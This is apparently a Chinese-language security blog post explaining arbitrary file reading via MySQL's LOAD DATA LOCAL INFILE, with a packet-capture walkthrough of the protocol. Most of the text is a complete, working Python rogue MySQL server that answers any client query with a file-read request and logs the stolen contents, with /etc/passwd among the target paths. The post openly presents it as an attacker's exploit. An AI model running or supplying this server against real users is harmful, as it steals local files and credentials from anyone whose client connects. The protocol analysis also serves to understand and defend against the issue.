Mysql任意文件读取

LOAD DATA INFILE#

mysql的LOAD DATA INFILE语句主要用于读取一个文件的内容并且存入一个表中。通常有两种用法，分别是

1
LOAD DATA INFILE "/etc/passwd" into table test fields terminated by "\n"
2
LOAD DATA LOCAL INFILE "/etc/passwd" into table test fields terminated by "\n

情况一读取的是服务端的/etc/passwd，情况二则读取的是客户端的/etc/passwd。在读取完文件之后会把他存到Test表中，其间内容以\n为分割符分开，我们重点关注一下LOAD DATA LOCAL INFILE

其工作过程大致如下：

用户在客户端输入：load data local file “/data.txt” into table test；
客户端->服务端：我想把我本地的/data.txt文件插入到test表中；
服务端->客户端：把你本地的/data.txt文件发给我；
客户端->服务端：/data.txt文件的内容；

LOAD DATA LOCAL INFILE 的操作结果如下 LOAD DATA INFILE 的操作结果如下

抓包分析#

登录部分#

kali连windows上的mysql，同时开启wireshark进行抓包，第一个是服务器发给客户端的greeting包，用来告知客户端服务器的基本信息。

接下来是客户端发给服务端的登录请求包，里面包含了用户名密码之类的信息服务端返回一个ok包，表明当前登录验证成功然后是客户端初始化的一些查询，比如select database(); select @@version_comment;

LOAD DATA LOCAL INFILE 部分#

接着来看LOAD DATA LOCAL INFILE 部分，客户端向服务端发起请求，其中包含执行语句

紧接着服务器返回了一个包含刚才所要LOAD DATA INFILE的文件名/etc/passwd的特殊格式数据包。客户端收到文件名之后，向服务端发送了/etc/passwd里的内容

Exp#

关键的节点显然在最后一步的Response TABULAR上。作为攻击者，我们无需在接收到LOAD DATA INFILE请求的时候才回复Response TABULAR，而是在任何一个Request Query后面都可以回复我们定制好的Response TABULAR，以此来实现任意文件读取

ps：还记得那个初始化查询不？利用起来

总结一下，伪造的Mysql服务端可以分为以下三个步骤：

向客户端发送Greeting数据包
客户端发送登录请求时，回复Response OK的数据包
客户端发送查询请求时，回复Response TABULAR数据包进行读文件

这里直接拿现成的了，感谢师傅们的智慧

1
#!/usr/bin/env python
2
#coding: utf8
3

4

5
import socket
6
import asyncore
7
import asynchat
8
import struct
9
import random
10
import logging
11
import logging.handlers
12

13

14

15
PORT = 3306
16

17
log = logging.getLogger(__name__)
18

19
log.setLevel(logging.INFO)
20
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
21
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
22
log.addHandler(
23
    tmp_format
24
)
25

26
filelist = (
27
    #'/etc/passwd',
28
    'F:/test.txt',
29
)
30

31

32
#================================================
33
#=======No need to change after this lines=======
34
#================================================
35

36
__author__ = 'Gifts'
37

38
def daemonize():
39
    import os, warnings
40
    if os.name != 'posix':
41
        warnings.warn('Cant create daemon on non-posix system')
42
        return
43

44
    if os.fork(): os._exit(0)
45
    os.setsid()
46
    if os.fork(): os._exit(0)
47
    os.umask(0o022)
48
    null=os.open('/dev/null', os.O_RDWR)
49
    for i in xrange(3):
50
        try:
51
            os.dup2(null, i)
52
        except OSError as e:
53
            if e.errno != 9: raise
54
    os.close(null)
55

56

57
class LastPacket(Exception):
58
    pass
59

60

61
class OutOfOrder(Exception):
62
    pass
63

64

65
class mysql_packet(object):
66
    packet_header = struct.Struct('<Hbb')
67
    packet_header_long = struct.Struct('<Hbbb')
68
    def __init__(self, packet_type, payload):
69
        if isinstance(packet_type, mysql_packet):
70
            self.packet_num = packet_type.packet_num + 1
71
        else:
72
            self.packet_num = packet_type
73
        self.payload = payload
74

75
    def __str__(self):
76
        payload_len = len(self.payload)
77
        if payload_len < 65536:
78
            header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
79
        else:
80
            header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
81

82
        result = "{0}{1}".format(
83
            header,
84
            self.payload
85
        )
86
        return result
87

88
    def __repr__(self):
89
        return repr(str(self))
90

91
    @staticmethod
92
    def parse(raw_data):
93
        packet_num = ord(raw_data[0])
94
        payload = raw_data[1:]
95

96
        return mysql_packet(packet_num, payload)
97

98

99
class http_request_handler(asynchat.async_chat):
100

101
    def __init__(self, addr):
102
        asynchat.async_chat.__init__(self, sock=addr[0])
103
        self.addr = addr[1]
104
        self.ibuffer = []
105
        self.set_terminator(3)
106
        self.state = 'LEN'
107
        self.sub_state = 'Auth'
108
        self.logined = False
109
        self.push(
110
            mysql_packet(
111
                0,
112
                "".join((
113
                    '\x0a',  # Protocol
114
                    '5.6.28-0ubuntu0.14.04.1' + '\0',
115
                    '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
116
                ))            )
117
        )
118

119
        self.order = 1
120
        self.states = ['LOGIN', 'CAPS', 'ANY']
121

122
    def push(self, data):
123
        log.debug('Pushed: %r', data)
124
        data = str(data)
125
        asynchat.async_chat.push(self, data)
126

127
    def collect_incoming_data(self, data):
128
        log.debug('Data recved: %r', data)
129
        self.ibuffer.append(data)
130

131
    def found_terminator(self):
132
        data = "".join(self.ibuffer)
133
        self.ibuffer = []
134

135
        if self.state == 'LEN':
136
            len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
137
            if len_bytes < 65536:
138
                self.set_terminator(len_bytes)
139
                self.state = 'Data'
140
            else:
141
                self.state = 'MoreLength'
142
        elif self.state == 'MoreLength':
143
            if data[0] != '\0':
144
                self.push(None)
145
                self.close_when_done()
146
            else:
147
                self.state = 'Data'
148
        elif self.state == 'Data':
149
            packet = mysql_packet.parse(data)
150
            try:
151
                if self.order != packet.packet_num:
152
                    raise OutOfOrder()
153
                else:
154
                    # Fix ?
155
                    self.order = packet.packet_num + 2
156
                if packet.packet_num == 0:
157
                    if packet.payload[0] == '\x03':
158
                        log.info('Query')
159

160
                        filename = random.choice(filelist)
161
                        PACKET = mysql_packet(
162
                            packet,
163
                            '\xFB{0}'.format(filename)
164
                        )
165
                        self.set_terminator(3)
166
                        self.state = 'LEN'
167
                        self.sub_state = 'File'
168
                        self.push(PACKET)
169
                    elif packet.payload[0] == '\x1b':
170
                        log.info('SelectDB')
171
                        self.push(mysql_packet(
172
                            packet,
173
                            '\xfe\x00\x00\x02\x00'
174
                        ))
175
                        raise LastPacket()
176
                    elif packet.payload[0] in '\x02':
177
                        self.push(mysql_packet(
178
                            packet, '\0\0\0\x02\0\0\0'
179
                        ))
180
                        raise LastPacket()
181
                    elif packet.payload == '\x00\x01':
182
                        self.push(None)
183
                        self.close_when_done()
184
                    else:
185
                        raise ValueError()
186
                else:
187
                    if self.sub_state == 'File':
188
                        log.info('-- result')
189
                        log.info('Result: %r', data)
190

191
                        if len(data) == 1:
192
                            self.push(
193
                                mysql_packet(packet, '\0\0\0\x02\0\0\0')
194
                            )
195
                            raise LastPacket()
196
                        else:
197
                            self.set_terminator(3)
198
                            self.state = 'LEN'
199
                            self.order = packet.packet_num + 1
200

201
                    elif self.sub_state == 'Auth':
202
                        self.push(mysql_packet(
203
                            packet, '\0\0\0\x02\0\0\0'
204
                        ))
205
                        raise LastPacket()
206
                    else:
207
                        log.info('-- else')
208
                        raise ValueError('Unknown packet')
209
            except LastPacket:
210
                log.info('Last packet')
211
                self.state = 'LEN'
212
                self.sub_state = None
213
                self.order = 0
214
                self.set_terminator(3)
215
            except OutOfOrder:
216
                log.warning('Out of order')
217
                self.push(None)
218
                self.close_when_done()
219
        else:
220
            log.error('Unknown state')
221
            self.push('None')
222
            self.close_when_done()
223

224

225
class mysql_listener(asyncore.dispatcher):
226
    def __init__(self, sock=None):
227
        asyncore.dispatcher.__init__(self, sock)
228

229
        if not sock:
230
            self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
231
            self.set_reuse_addr()
232
            try:
233
                self.bind(('', PORT))
234
            except socket.error:
235
                exit()
236

237
            self.listen(5)
238

239
    def handle_accept(self):
240
        pair = self.accept()
241

242
        if pair is not None:
243
            log.info('Conn from: %r', pair[1])
244
            tmp = http_request_handler(pair)
245

246

247
z = mysql_listener()
248
# daemonize()
249
asyncore.loop()